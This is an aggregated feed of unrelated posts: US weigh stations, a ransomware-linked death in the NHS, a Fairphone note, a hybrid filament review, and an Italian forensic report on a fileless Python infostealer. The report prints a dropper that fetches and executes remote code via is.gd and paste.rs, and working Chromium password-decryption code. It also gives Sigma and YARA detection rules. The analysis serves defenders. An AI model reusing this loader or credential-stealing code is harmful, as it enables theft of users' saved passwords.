A lot of people complain that driving across the United States is boring. Having done the coast-to-coast trip seven times now, I can’t agree. Sure, the stretches through the Corn Belt get a little monotonous, but for someone like me who wants to know how everything works, even endless agriculture is fascinating; I love me some center-pivot irrigation.

One thing that has always attracted my attention while on these long road trips is the weigh stations that pop up along the way, particularly when you transition from one state to another. Maybe it’s just getting a chance to look at something other than wheat, but weigh stations are interesting in their own right because of everything that’s going on in these massive roadside plazas. Gone are the days of a simple pull-off with a mechanical scale that was closed far more often than it was open. Today’s weigh stations are critical infrastructure installations that are bristling with sensors to provide a multi-modal insight into the state of the trucks — and drivers — plying our increasingly crowded highways.

All About the Axles

Before diving into the nuts and bolts of weigh stations, it might be helpful to discuss the rationale behind infrastructure whose main function, at least to the casual observer, seems to be making the truck driver’s job even more challenging, not to mention less profitable. We’ve all probably sped by long lines of semi trucks queued up for the scales alongside a highway, pitying the poor drivers and wondering if the whole endeavor is worth the diesel being wasted.

The answer to that question boils down to one word: axles. In the United States, the maximum legal gross vehicle weight (GVW) for a fully loaded semi truck is typically 40 tons, although permits are issued for overweight vehicles. The typical “18-wheeler” will distribute that load over five axles, which means each axle transmits 16,000 pounds of force into the pavement, assuming an even distribution of weight across the length of the vehicle. Studies conducted in the early 1960s revealed that heavier trucks caused more damage to roadways than lighter passenger vehicles, and that the increase in damage is proportional to the fourth power of axle weight. So, keeping a close eye on truck weights is critical to protecting the highways.

Just how much damage trucks can cause to pavement is pretty alarming. Each axle of a truck creates a compression wave as it rolls along the pavement, as much as a few millimeters deep, depending on road construction and loads. The relentless cycle of compression and expansion results in pavement fatigue and cracks, which let water into the interior of the roadway. In cold weather, freeze-thaw cycles exert tremendous forces on the pavement that can tear it apart in short order. The greater the load on the truck, the more stress it puts on the roadway and the faster it wears out.

The other, perhaps more obvious reason to monitor axles passing over a highway is that they’re critical to truck safety. A truck’s axles have to support huge loads in a dynamic environment, and every component mounted to each axle, including springs, brakes, and wheels, is subject to huge forces that can lead to wear and catastrophic failure. Complete failure of an axle isn’t uncommon, and a driver can be completely unaware that a wheel has detached from a trailer and become an unguided missile bouncing down the highway. Regular inspections of the running gear on trucks and trailers are critical to avoiding these potentially catastrophic occurrences.

youtube.com/embed/veCl1BgoI74?…

Ways to Weigh

The first thing you’ll likely notice when driving past one of the approximately 700 official weigh stations lining the US Interstate highway system is how much space they take up. In contrast to the relatively modest weigh stations of the past, modern weigh stations take up a lot of real estate. Most weigh stations are optimized to get the greatest number of trucks processed as quickly as possible, which means constructing multiple lanes of approach to the scale house, along with lanes that can be used by exempt vehicles to bypass inspection, and turnout lanes and parking areas for closer inspection of select vehicles.

In addition to the physical footprint of the weigh station proper, supporting infrastructure can often be seen miles in advance. Fixed signs are usually the first indication that you’re getting near a weigh station, along with electronic signboards that can be changed remotely to indicate if the weigh station is open or closed. Signs give drivers time to figure out if they need to stop at the weigh station, and to begin the process of getting into the proper lane to negotiate the exit. Most weigh stations also have a net of sensors and cameras mounted to poles and overhead structures well before the weigh station exit. These are monitored by officers in the station to spot any trucks that are trying to avoid inspections.
Overhead view of a median weigh station on I-90 in Haugan, Montana. Traffic from both eastbound and westbound lanes uses left exits to access the scales in the center. There are ample turnouts for parking trucks that fail one test or another. Source: Google Maps.
Most weigh stations in the US are located off the right side of the highway, as left-hand exit ramps are generally more dangerous than right exits. Still, a single weigh station located in the median of the highway can serve traffic from both directions, so the extra risk of accidents from exiting the highway to the left is often outweighed by the savings of not having to build two separate facilities. Either way, the main feature of a weigh station is the scale house, a building with large windows that offer a commanding view of the entire plaza as well as an up-close look at the trucks passing over the scales embedded in the pavement directly adjacent to the structure.

Scales at a weigh station are generally of two types: static scales, and weigh-in-motion (WIM) systems. A static scale is a large platform, called a weighbridge, set into a pit in the inspection lane, with the surface flush with the roadway. The platform floats within the pit, supported by a set of cantilevers that transmit the force exerted by the truck to electronic load cells. The signal from the load cells is cleaned up by signal conditioners before going to analog-to-digital converters and being summed and dampened by a scale controller in the scale house.

The weighbridge on a static scale is usually long enough to accommodate an entire semi tractor and trailer, which accurately weighs the entire vehicle in one measurement. The disadvantage is that the entire truck has to come to a complete stop on the weighbridge to take a measurement. Add in the time it takes for the induced motion of the weighbridge to settle, along with the time needed for the driver to make a slow approach to the scale, and each measurement can add up to significant delays for truckers.
Weigh-in-motion sensor. WIM systems measure the force exerted by each axle and calculate a total gross vehicle weight (GVW) for the truck while it passes over the sensor. The spacing between axles is also measured to ensure compliance with state laws. Source: Central Carolina Scales, Inc.
To avoid these issues, weigh-in-motion systems are often used. WIM systems use much the same equipment as the weighbridge on a static scale, although they tend to use piezoelectric sensors rather than traditional strain-gauge load cells, and usually have a platform that’s only big enough to have one axle bear on it at a time. A truck using a WIM scale remains in motion while the force exerted by each axle is measured, allowing the controller to come up with a final GVW as well as weights for each axle. While some WIM systems can measure the weight of a vehicle at highway speed, most weigh stations require trucks to keep their speed pretty slow, under five miles per hour. This is obviously for everyone’s safety, and even though the somewhat stately procession of trucks through a WIM can still plug traffic up, keeping trucks from having to come to a complete stop and set their brakes greatly increases weigh station throughput.

Another advantage of WIM systems is that the spacing between axles can be measured. The speed of the truck through the scale can be measured, usually using a pair of inductive loops embedded in the roadway around the WIM sensors. Knowing the vehicle’s speed through the scale allows the scale controller to calculate the distance between axles. Some states strictly regulate the distance between a trailer’s kingpin, which is where it attaches to the tractor, and the trailer’s first axle. Trailers that are not in compliance can be flagged and directed to a parking area to await a service truck to come by to adjust the spacing of the trailer bogie.

Keep It Moving, Buddy

A PrePass transponder reader and antenna over Interstate 10 near Pearlington, Mississippi. Trucks can bypass a weigh station if their in-cab transponder identifies them as certified. Source: Tony Webster, CC BY-SA 2.0.
Despite the increased throughput of WIM scales, there are often too many trucks trying to use a weigh station at peak times. To reduce congestion further, some states participate in automatic bypass systems. These systems, generically known as PrePass for the specific brand with the greatest market penetration, use in-cab transponders that are interrogated by transmitters mounted over the roadway well in advance of the weigh station. The transponder code is sent to PrePass for authentication, and if the truck ID comes back to a company that has gone through the PrePass certification process, a signal is sent to the transponder telling the driver to bypass the weigh station. The transponder lights a green LED in this case, which stays lit for about 15 minutes, just in case the driver gets stopped by an overzealous trooper who mistakes the truck for a scofflaw.

PrePass transponders are just one aspect of an entire suite of automatic vehicle identification (AVI) systems used in the typical modern weigh station. Most weigh stations are positively bristling with cameras, some of which are dedicated to automatic license plate recognition. These are integrated into the scale controller system and serve to associate WIM data with a specific truck, so violations can be flagged. They also help with the enforcement of traffic laws, as well as locating human traffickers, an increasingly common problem. Weigh stations also often have laser scanners mounted on bridges over the approach lanes to detect unpermitted oversized loads. Image analysis systems are also used to verify the presence and proper operation of required equipment, such a mirrors, lights, and mudflaps. Some weigh stations also have systems that can interrogate the electronic logging device inside the cab to verify that the driver isn’t in violation of hours of service laws, which dictate how long a driver can be on the road before taking breaks.

Sensors Galore

IR cameras watch for heat issues on trucks at a Kentucky weigh station. Heat signatures can be used to detect bad tires, stuck brakes, exhaust problems, and even illicit cargo. Source: Trucking Life with Shawn
Another set of sensors often found in the outer reaches of the weigh station plaza is related to the mechanical status of the truck. Infrared cameras are often used to scan for excessive heat being emitted by an axle, often a sign of worn or damaged brakes. The status of a truck’s tires can also be monitored thanks to Tire Anomaly and Classification Systems (TACS), which use in-road sensors that can analyze the contact patch of each tire while the vehicle is in motion. TACS can detect flat tires, over- and under-inflated tires, tires that are completely missing from an axle, or even mismatched tires. Any of these anomalies can cause a tire to quickly wear out and potentially self-destruct at highway speeds, resulting in catastrophic damage to surrounding traffic.

Trucks with problems are diverted by overhead signboards and direction arrows to inspection lanes. There, trained truck inspectors will closely examine the flagged problem and verify the violation. If the problem is relatively minor, like a tire inflation problem, the driver might be able to fix the issue and get back on the road quickly. Trucks that can’t be made safe immediately might have to wait for mobile service units to come fix the problem, or possibly even be taken off the road completely. Only after the vehicle is rendered road-worthy again can you keep on trucking.

Featured image: “WeighStationSign” by [Wasted Time R]

hackaday.com/2025/06/26/field-…

Non è la prima volta che un attacco informatico si traduce in una perdita di vite umane.
Ne avevamo già parlato nell’articolo “I decessi avvenuti per il ransomware. I casi noti, le tendenze e il punto sull’Italia“, in cui analizzavamo il legame diretto tra incidenti cyber e morti documentate.

Purtroppo, questo fenomeno è sempre più frequente. Viviamo in un mondo interamente circondato da tecnologie digitali, e proprio per questo esposto al rischio di compromissione. Ma quando il bersaglio non è più un semplice dato, bensì un sistema critico come un pronto soccorso o un’infrastruttura sanitaria, le conseguenze non sono più virtuali: diventano tragicamente reali.

Secondo il National Health Service (NHS), l’anno scorso un attacco ransomware che ha interrotto gli esami del sangue in diversi ospedali di Londra ha contribuito alla morte di un paziente. L’attacco del gruppo di criminalità informatica Qilin contro il servizio di patologia Synnovis con sede a Londra, avvenuto lo scorso giugno, ha causato gravi interruzioni all’assistenza in numerosi ospedali del Servizio Sanitario Nazionale e presso fornitori di servizi sanitari di Londra.

A seguito dell’attacco, gli ospedali non sono stati in grado di eseguire gli esami del sangue alla normale velocità. Un portavoce del King’s College Hospital NHS Foundation Trust ha affermato che questo ritardo è stato tra “una serie di fattori contribuenti” che hanno portato alla morte di un paziente durante l’incidente, come riportato per primo dall’Health Service Journal.

“Purtroppo un paziente è morto improvvisamente durante l’attacco informatico. Come da prassi standard in questi casi, abbiamo effettuato un’analisi dettagliata delle sue cure”, ha dichiarato il portavoce. L’indagine sull’incidente relativo alla sicurezza del paziente ha individuato diversi fattori che hanno contribuito al decesso del paziente. Tra questi, la lunga attesa per l’esito di un esame del sangue a causa dell’attacco informatico che ha colpito i servizi di anatomia patologica in quel momento.

In una dichiarazione, il CEO di Synnovis, Mark Dollar, ha dichiarato: “Siamo profondamente addolorati nell’apprendere che l’attacco informatico criminale dell’anno scorso sia stato identificato come uno dei fattori che hanno contribuito alla morte di questo paziente. Siamo vicini alla famiglia coinvolta”.

Il mese scorso, Recorded Future News ha rivelato che due attacchi informatici che avrebbero interessato il Servizio Sanitario Nazionale (NHS) nel 2024 erano stati formalmente identificati come potenziali fattori di rischio per i pazienti. Si prevede che questi attacchi riguardino Synnovis e il Wirral University Teaching Hospital NHS Foundation Trust, causando ritardi nei trattamenti oncologici.

Si ritiene che i dati di oltre 900.000 individui siano stati compromessi dalle tattiche estorsive del gruppo ransomware, che prevedevano la pubblicazione dei risultati dei test che rivelavano i nomi dei pazienti con sintomi di infezioni sessualmente trasmissibili e cancro.

Un’analisi dei dati condotta dagli specialisti in violazioni dei dati CaseMatrix ha identificato nomi personali, date di nascita, numeri di telefono del Servizio Sanitario Nazionale e, in alcuni casi, dettagli di contatto personali, insieme ai moduli di patologia e istologia utilizzati per condividere i dati dei pazienti tra reparti medici e istituzioni. A un anno dalla violazione, i pazienti interessati non sono ancora stati informati su quali dati siano stati esposti nell’incidente.

L'articolo È morto per colpa di un ransomware! Un’altra vittima si aggiunge alla lista proviene da il blog della sicurezza informatica.

TLP: AMBER
Analista: Agostino Pellegrino, Crescenzo Cuoppolo, Alessio Bandini
Data ultima revisione: 2025-06-24

Questo report tecnico forense documenta l’analisi completa di un infostealer multi-stadio veicolato tramite un loader fileless in Python, identificato con la sigla “AP”. L’intera catena di infezione è eseguita in memoria e sfrutta servizi legittimi pubblici (Telegram, is.gd, paste.rs) per evitare la rilevazione e semplificare l’aggiornamento remoto del payload.

Il file iniziale, denominato Photos, contiene un dropper che esegue dinamicamente un secondo stadio offuscato, il quale a sua volta decodifica ed esegue in memoria un infostealer capace di esfiltrare informazioni sensibili da browser Chromium.

Catena di Infezione

Stadio 1 – Dropper Iniziale

Il file Photos contiene codice Base64 offuscato:

___________ = 'ADN_UZJomrp3vPMujoH4bot'; exec(__import__('base64').b64decode('...'))

Decodifica del codice:

import requests, re
exec(
requests.get(
requests.head(
f'https://is.gd/{match.group(1)}', allow_redirects=True
).url
).text
)

if (
match := re.search(
r'

Funzionamento:

• Recupera da un canale Telegram un codice og:description (es. fVmzS)
• Usa is.gd per risolvere il link accorciato
• Recupera un payload da paste.rs ed esegue dinamicamente

Stadio 2 – Loader Offuscato

Contenuto scaricato da paste.rs/fVmzS. Esegue la seguente catena:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|c~*|PFlk|y|1XNVIgA|vOF$g0Ys7>c3D)_@p{S!e)(1e%eo3lNe(LIXmGNenkpZCz$

Dopo b85 → zlib → marshal, è necessario un ulteriore passaggio:

decoded = bytearray([b ^ 0x04 for b in payload_bytes])

Il risultato è un bytecode deoffuscato eseguibile direttamente in memoria:

import os, shutil, zipfile, sqlite3
from Cryptodome.Cipher import AES
import win32crypt
import json
import base64

# Estrazione dati da Chromium (semplificato)

def get_chrome_data():
local_state_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Local State"
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = json.loads(f.read())
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
key = win32crypt.CryptUnprotectData(key, None, None, None, 0)
[1] login_data_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
shutil.copy2(login_data_path, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
for row in cursor.fetchall():
login_url = row
[0] username = row
[1] password = win32crypt.CryptUnprotectData(row[2])[1].decode()
print(f"URL: {login_url}\nUsername: {username}\nPassword: {password}\n")
cursor.close()
conn.close()
os.remove("Loginvault.db")
get_chrome_data()

Stadio 3 – Infostealer

Il codice risultante:

• Raccoglie credenziali, cookie, cronologia e carte da Chromium
• Cattura fingerprinting del sistema
• Comprimi dati in archivio .zip
• Prepara e invia l’esfiltrazione verso un server remoto (C2)

Indicatori di Compromissione

Tecniche MITRE ATT&CK

• T1059 – Command and Scripting Interpreter
• T1027 – Obfuscated Files or Information
• T1071.001 – Web Protocols
• T1082 – System Information Discovery
• T1567.002 – Exfiltration over Web Services
• T1218.010 – Proxy Execution (custom variant)

Rilevazione

Sigma Rule

title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Rileva dropper Python fileless con payload remote

YARA Rule

rule Fileless_Telegram_Loader {
meta:
description = "Rileva loader fileless basato su Telegram + is.gd"
author = "Agostino Pellegrino (apinfosec.com)"
version = "1.1"
date = "2025-06-24"
strings:
$a = "exec(requests.get(" ascii
$b = "https://t.me/" ascii
$c = "https://is.gd/" ascii
$d = "og:description" ascii
condition:
all of them and filesize

Raccomandazioni

• Isolare ambienti Python non gestiti
• Bloccare traffico a t.me, is.gd, paste.rs ove non necessario
• Attivare logging avanzato su processi RAM-residenti
• Applicare detection YARA e Sigma in EDR/SIEM
• Segnalare a CSIRT nazionale

Conclusioni

L’analisi tecnica condotta ha evidenziato l’elevato livello di sofisticazione dell’infostealer “AP”, capace di operare completamente in memoria, eludendo gran parte dei meccanismi di rilevamento tradizionali. La catena d’infezione multi-stadio utilizza un dropper fileless scritto in Python e sfrutta servizi pubblici legittimi — come Telegram, is.gd e paste.rs — per veicolare, aggiornare e rendere dinamico il payload finale.

Il secondo stadio, fortemente offuscato, culmina nell’esecuzione di un infostealer con capacità avanzate di esfiltrazione dati da browser Chromium-based, comprese credenziali salvate, cookie, cronologia e informazioni sensibili.

L’uso creativo e malevolo di meccanismi comuni (come i meta tag HTML, URL accorciati e servizi di messaggistica) rende questa minaccia particolarmente insidiosa, dimostrando una crescente tendenza all’abuso di infrastrutture legittime per finalità illecite.

Le tecniche MITRE ATT&CK individuate confermano il comportamento stealth e modulare del malware. L’adozione di meccanismi di rilevazione specifici, come regole Sigma e YARA personalizzate, è fondamentale per mitigare efficacemente questa minaccia. Inoltre, l’implementazione di policy restrittive e il monitoraggio continuo degli ambienti Python non gestiti rappresentano misure difensive prioritarie.

Questo caso studio rappresenta un chiaro esempio dell’evoluzione dei moderni infostealer verso architetture completamente fileless, con capacità di persistenza e aggiornamento che richiedono una risposta difensiva altrettanto dinamica e proattiva.

L'articolo Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi proviene da il blog della sicurezza informatica.

Dal 2020 sono un utente #Fairphone, prima con il FP3+ e adesso con il FP5.

Sono un "Fairphone Angel" (è un nome che fa un po' ridere, lo so 😁 ) ovvero una di quelle persone che mettono la loro esperienza a disposizione di chi possiede un Fairphone o è interessato a saperne qualcosa di più (*). Maggiori informazioni le potete trovare qui.

Ho visto che nel Fediverso c'è un certo interesse su questi argomenti e così ho pensato di mettere un post "ad hoc" nel caso qualcuno volesse informazioni sul telefono.

Il sito ufficiale Fairphone è qui.

Bene, a voi la linea...

(*) Non abbiamo nessun rapporto organico con l'azienda né riceviamo compensi sotto nessuna forma, semplicemente crediamo in questo progetto, ci fa piacere contribuire in qualche modo e lo facciamo così.

The Stronghero 3D hybrid PLA PETG filament, with visible PETG core. (Credit: My Tech Fun, YouTube)
Sometimes you see an FDM filament pop up that makes you do a triple-take because it doesn’t seem to make a lot of sense. This is the case with a hybrid PLA/PETG filament by Stronghero 3D that features a PETG core. This filament also intrigued [Dr. Igor Gaspar] who imported a spool from the US to have a poke at it to see why you’d want to combine these two filament materials.

According to the manufacturer, the PLA outside makes up 60% of the filament, with the rest being the PETG core. The PLA is supposed to shield the PETG from moisture, while adding more strength and weather resistance to the PLA after printing. Another interesting aspect is the multi-color look that this creates, and which [Igor]’s prints totally show. Finding the right temperatures for the bed and extruder was a challenge and took multiple tries with the Bambu Lab P1P including bed adhesion troubles.

As for the actual properties of this filament, the layer adhesion test showed it to be significantly worse than plain PLA or PETG when printed at extruder temperatures from 225 °C to 245 °C. When the shear stress is put on the material instead of the layer adhesion, the results are much better, while torque resistance is better than plain PETG. This is a pattern that repeats across impact and other tests, with PETG more brittle. Thermal deformation temperature is, unsurprisingly, between both materials, making this filament mostly a curiosity unless its properties work much better for your use case than a non-hybrid filament.

youtube.com/embed/PnMUxLlnPSA?…

hackaday.com/2025/06/26/pla-wi…

Carino... dopo guardo.

ilpost.it/2025/06/26/piattafor…

Ora c’è un sito per controllare come vanno le liste d’attesa in Italia

^{Il Post}